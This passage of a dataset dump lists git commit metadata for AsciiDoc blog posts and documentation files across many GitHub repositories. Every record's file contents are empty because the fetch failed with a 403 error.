2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","repos":"topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io","old_file":"_posts\/2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","new_file":"_posts\/2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topranks\/topranks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b9db994a32ac0c90506b736898ee6ff42694a08","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e749df33328fe617fb4048383ef0465428a35907","subject":"Create do-code-block-es.adoc","message":"Create do-code-block-es.adoc\n\nSpanish translation for do-code-block-.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-code-block-es.adoc","new_file":"src\/do\/do-code-block-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"271ee2143ca0562911cfb51bf7d1b0fe6bba0ded","subject":"Initial readme","message":"Initial readme\n","repos":"lichia\/docker-scripts,jpopelka\/docker-scripts,TomasTomecek\/docker-scripts,goldmann\/docker-squash,goldmann\/docker-scripts","old_file":"squash\/README.adoc","new_file":"squash\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/goldmann\/docker-squash.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14fb9dc5def827bf02623f5c1a683d6f686021a2","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/hello_4.adoc","new_file":"content\/writings\/hello_4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d6a5fe35bb4daf81efbfd5db7025313266f9177c","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/hello_everyone.adoc","new_file":"content\/writings\/hello_everyone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8d80c1b7ecabb0c0789723b6a20d654d0556acb4","subject":"Update 2018-01-06-calculator-app-with-Swift.adoc","message":"Update 2018-01-06-calculator-app-with-Swift.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-06-calculator-app-with-Swift.adoc","new_file":"_posts\/2018-01-06-calculator-app-with-Swift.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"037611a6e5bcd466b883983f528100b317460db9","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f109d23293754d90650f722fbf507aae4e0b8423","subject":"Added configuration README","message":"Added configuration README","repos":"ivannov\/core,forge\/core,agoncal\/core,oscerd\/core,forge\/core,jerr\/jbossforge-core,agoncal\/core,ivannov\/core,agoncal\/core,ivannov\/core,ivannov\/core,stalep\/forge-core,D9110\/core,oscerd\/core,agoncal\/core,pplatek\/core,D9110\/core,pplatek\/core,ivannov\/core,ivannov\/core,pplatek\/core,forge\/core,ivannov\/core,oscerd\/core,forge\/core,stalep\/forge-core,forge\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,jerr\/jbossforge-core,forge\/core,agoncal\/core,jerr\/jbossforge-core,oscerd\/core,D9110\/core,D9110\/core,agoncal\/core,agoncal\/core,oscerd\/core,agoncal\/core,D9110\/core,pplatek\/core,D9110\/core,D9110\/core,jerr\/jbossforge-core,agoncal\/core,pplatek\/core,oscerd\/core,D9110\/core,pplatek\/core,jerr\/jbossforge-core,forge\/core,oscerd\/core,jerr\/jbossforge-core,ivannov\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,D9110\/core,pplatek\/core,oscerd\/core,ivannov\/core,agoncal\/core,D9110\/core,pplatek\/core,ivannov\/core,oscerd\/core,pplatek\/core,pplatek\/core,forge\/core,forge\/core,oscerd\/core,forge\/core","old_file":"configuration\/README.asciidoc","new_file":"configuration\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/D9110\/core.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"1351752c66b06414ab3b663d94157eda2fc62b1e","subject":"y2b create post A big TV that's good for gaming? (Sharp 60-inch LC-60LE857U Unboxing \\u0026 Demo)","message":"y2b create post A big TV that's good for gaming? (Sharp 60-inch LC-60LE857U Unboxing \\u0026 Demo)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-12-12-A-big-TV-thats-good-for-gaming-Sharp-60inch-LC60LE857U-Unboxing-u0026-Demo.adoc","new_file":"_posts\/2013-12-12-A-big-TV-thats-good-for-gaming-Sharp-60inch-LC60LE857U-Unboxing-u0026-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b96c5632ebba4197c8d6bbd634b28c561ac21936","subject":"y2b create post Far Cry 4 Kyrat Edition Unboxing \\u0026 Giveaway!","message":"y2b create post Far Cry 4 Kyrat Edition Unboxing \\u0026 Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-11-20-Far-Cry-4-Kyrat-Edition-Unboxing-u0026-Giveaway.adoc","new_file":"_posts\/2014-11-20-Far-Cry-4-Kyrat-Edition-Unboxing-u0026-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f99bf4bb202af4f936631d18f92a624debf732b4","subject":"Update 2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","message":"Update 2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","new_file":"_posts\/2016-10-04-CentOS-7-FirewallD-simple-description-and-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da5d2ed5a634420b98d57d0508f8571a62ff0306","subject":"Update 2016-10-09-Reflections-Code-Coverage-and-a-lot-of-Headache.adoc","message":"Update 2016-10-09-Reflections-Code-Coverage-and-a-lot-of-Headache.adoc","repos":"andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io","old_file":"_posts\/2016-10-09-Reflections-Code-Coverage-and-a-lot-of-Headache.adoc","new_file":"_posts\/2016-10-09-Reflections-Code-Coverage-and-a-lot-of-Headache.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andreassiegelrfid\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07a0f9f41920a61c34c61555943d900313edd603","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8eaa5375691bd68cf765f898dfb36c61e1832d50","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85ccda332d29cc690f0bcb9ddd541950db9ca8a3","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e741d2d76716f2af5cdcefaa8919825a633d6e25","subject":"Add documentation for ui.style in noterc(5)","message":"Add documentation for ui.style in noterc(5)\n","repos":"rumpelsepp\/pynote","old_file":"man\/noterc.5.adoc","new_file":"man\/noterc.5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85aede01117aeb8b42ba0bb51dfe909e4e4f4a50","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d857fe81975cf20cb07b3edb6fe7ac0d31500c5d","subject":"Update 2015-09-19-JSON-in-Python.adoc","message":"Update 2015-09-19-JSON-in-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5be3bc4edf80376ffba5b9f99595b94fd899fc6b","subject":"Deleted _posts\/2016-12-01-Salut-potozebi.adoc","message":"Deleted _posts\/2016-12-01-Salut-potozebi.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Salut-potozebi.adoc","new_file":"_posts\/2016-12-01-Salut-potozebi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85c5b28012cea7be1cf36b1015525a327c073ab0","subject":"Parse function","message":"Parse function\n","repos":"yurrriq\/cats,alesguzik\/cats,funcool\/cats,mccraigmccraig\/cats,OlegTheCat\/cats,tcsavage\/cats","old_file":"doc\/cats.asciidoc","new_file":"doc\/cats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"3351d13fd742550a95d5db25f0c400734f4b2136","subject":"Update 2017-07-14-O-que-e-Native-Script-e-a-comparacao-com-Xamarin-Ionic-e-React.adoc","message":"Update 2017-07-14-O-que-e-Native-Script-e-a-comparacao-com-Xamarin-Ionic-e-React.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-07-14-O-que-e-Native-Script-e-a-comparacao-com-Xamarin-Ionic-e-React.adoc","new_file":"_posts\/2017-07-14-O-que-e-Native-Script-e-a-comparacao-com-Xamarin-Ionic-e-React.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46626d363e17e200028c481a79e2a4cdad771b93","subject":"Update 2018-03-21-They-Creativity-is-something-you-get-by-birth-and-Me-Oh-Really.adoc","message":"Update 2018-03-21-They-Creativity-is-something-you-get-by-birth-and-Me-Oh-Really.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-03-21-They-Creativity-is-something-you-get-by-birth-and-Me-Oh-Really.adoc","new_file":"_posts\/2018-03-21-They-Creativity-is-something-you-get-by-birth-and-Me-Oh-Really.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32cc9d73e883fa2484aee454449bde9e3da3c073","subject":"Update 2018-09-08-Go.adoc","message":"Update 2018-09-08-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-08-Go.adoc","new_file":"_posts\/2018-09-08-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9e2223751bc2b6e66847da6e65c7c2b75ddcdb3","subject":"create post Which Smartphone Do They ACTUALLY Use? --- MKBHD, Austin Evans, Linus + More","message":"create post Which Smartphone Do They ACTUALLY Use? --- MKBHD, Austin Evans, Linus + More","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Which-Smartphone-Do-They-ACTUALLY-Use?-----MKBHD,-Austin-Evans,-Linus-+-More.adoc","new_file":"_posts\/2018-02-26-Which-Smartphone-Do-They-ACTUALLY-Use?-----MKBHD,-Austin-Evans,-Linus-+-More.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3433f1fbf1057099e5d602d0ba1cfcdf952ec7aa","subject":"y2b create post Pelican PS3 Triggers Unboxing (GET MORE KILLS!)","message":"y2b create post Pelican PS3 Triggers Unboxing (GET MORE KILLS!)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-04-Pelican-PS3-Triggers-Unboxing-GET-MORE-KILLS.adoc","new_file":"_posts\/2011-03-04-Pelican-PS3-Triggers-Unboxing-GET-MORE-KILLS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ef4347d6c67f94f541e0cfd2b5c6040466d9bbc","subject":"Update 2019-03-25-Annotated-Paper-A-Decomposable-Attention-Model-for-Natural-Language-Inference.adoc","message":"Update 2019-03-25-Annotated-Paper-A-Decomposable-Attention-Model-for-Natural-Language-Inference.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-03-25-Annotated-Paper-A-Decomposable-Attention-Model-for-Natural-Language-Inference.adoc","new_file":"_posts\/2019-03-25-Annotated-Paper-A-Decomposable-Attention-Model-for-Natural-Language-Inference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4bc2d02e00f3f845510e71a79c36681f3a19f6c9","subject":"y2b create post All Macbooks On SALE + Save on the G700 Gaming Mouse! (Deal Therapy)","message":"y2b create post All Macbooks On SALE + Save on the G700 Gaming Mouse! (Deal Therapy)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-06-All-Macbooks-On-SALE--Save-on-the-G700-Gaming-Mouse-Deal-Therapy.adoc","new_file":"_posts\/2013-05-06-All-Macbooks-On-SALE--Save-on-the-G700-Gaming-Mouse-Deal-Therapy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c4858d1677adb90be79e0b4c6c4ccf47d2466c5","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ffd6dc36489c030eaf38ef422d5dd77e0a6ba3d9","subject":"y2b create post Canon 60D Unboxing","message":"y2b create post Canon 60D Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-05-30-Canon-60D-Unboxing.adoc","new_file":"_posts\/2011-05-30-Canon-60D-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0258dd1bcd639c198b8daf0434f43b4e190fee5","subject":"Update 2015-05-11-non-android-phones.adoc","message":"Update 2015-05-11-non-android-phones.adoc","repos":"hapee\/hapee.github.io,hapee\/hapee.github.io,hapee\/hapee.github.io","old_file":"_posts\/2015-05-11-non-android-phones.adoc","new_file":"_posts\/2015-05-11-non-android-phones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hapee\/hapee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5eb1493d6cd78229730afda8cff9714dd896ac8","subject":"Update 2015-09-23-Garbage-Collection.adoc","message":"Update 2015-09-23-Garbage-Collection.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"871ac75f93c57ce2e459efacbf8301e143cc3d8d","subject":"Clarified attestation wording","message":"Clarified attestation wording\n\n#5258\n","repos":"khartec\/waltz,davidwatkins73\/waltz-dev,kamransaleem\/waltz,khartec\/waltz,khartec\/waltz,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev,kamransaleem\/waltz,davidwatkins73\/waltz-dev,khartec\/waltz,kamransaleem\/waltz,kamransaleem\/waltz","old_file":"docs\/design\/draft\/product-handling-options\/product-handling-options.adoc","new_file":"docs\/design\/draft\/product-handling-options\/product-handling-options.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/khartec\/waltz.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f3e08544057b9087f2abd221a3b4b9b556c7d8a","subject":"Update 2016-08-15-Wechat.adoc","message":"Update 2016-08-15-Wechat.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-15-Wechat.adoc","new_file":"_posts\/2016-08-15-Wechat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9341d22daa24ababa971ce896de5d3b65becef5c","subject":"add 1.0.1 release notes to prior_release_notes.adoc","message":"add 1.0.1 release notes to prior_release_notes.adoc\n\nChange-Id: Ieff57fd7120e98e2e1a7c0812e6c04eca704c6ad\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4699\nTested-by: Kudu Jenkins\nReviewed-by: Jean-Daniel Cryans <4bf4c125525b8623ac45dfd7774cbf531df19085@apache.org>\n","repos":"cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/prior_release_notes.adoc","new_file":"docs\/prior_release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59f8e51898065c40892c1f2b780939dca9b449d3","subject":"Update 2016-12-18-About-Me.adoc","message":"Update 2016-12-18-About-Me.adoc","repos":"chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io","old_file":"_posts\/2016-12-18-About-Me.adoc","new_file":"_posts\/2016-12-18-About-Me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chowwin\/chowwin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"533d76056063f442faabd25c0df0f44bcb93a174","subject":"Add ascii doc file","message":"Add ascii doc file","repos":"stefanpernes\/DARIAH-DKPro-Wrapper","old_file":"documentation\/user-guide.adoc","new_file":"documentation\/user-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stefanpernes\/DARIAH-DKPro-Wrapper.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a5cf13b177b5b13dda937b63b516a372e379d64e","subject":"more minor changes","message":"more minor changes\n","repos":"EMBL-EBI-SUBS\/subs,EMBL-EBI-SUBS\/subs","old_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4ab03761938bd23aff586b16aa40a2041cecdd5","subject":"Update 2017-03-25-Welcome.adoc","message":"Update 2017-03-25-Welcome.adoc","repos":"ronanki\/ronanki.github.io,ronanki\/ronanki.github.io,ronanki\/ronanki.github.io,ronanki\/ronanki.github.io","old_file":"_posts\/2017-03-25-Welcome.adoc","new_file":"_posts\/2017-03-25-Welcome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ronanki\/ronanki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"380e739cf1c55cf8d48c369a0bec839414ad44e8","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"408f7c717517e8b487f367d2cb31dfcc092537d2","subject":"Update 2018-01-16-Azure-9.adoc","message":"Update 2018-01-16-Azure-9.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-16-Azure-9.adoc","new_file":"_posts\/2018-01-16-Azure-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c3ccfbc334138b6d496f410a1735d406de795c6","subject":"Update 2015-05-18-uGUI.adoc","message":"Update 2015-05-18-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-18-uGUI.adoc","new_file":"_posts\/2015-05-18-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e12df9383cc81d7d4b0e875d3f4f192b0c39bddc","subject":"Update 2016-10-23-Test.adoc","message":"Update 2016-10-23-Test.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2016-10-23-Test.adoc","new_file":"_posts\/2016-10-23-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d289ec376c5ef4ba035ef5dae34c07c5322e797","subject":"Hawkular Metrics 0.12.0 - Release","message":"Hawkular 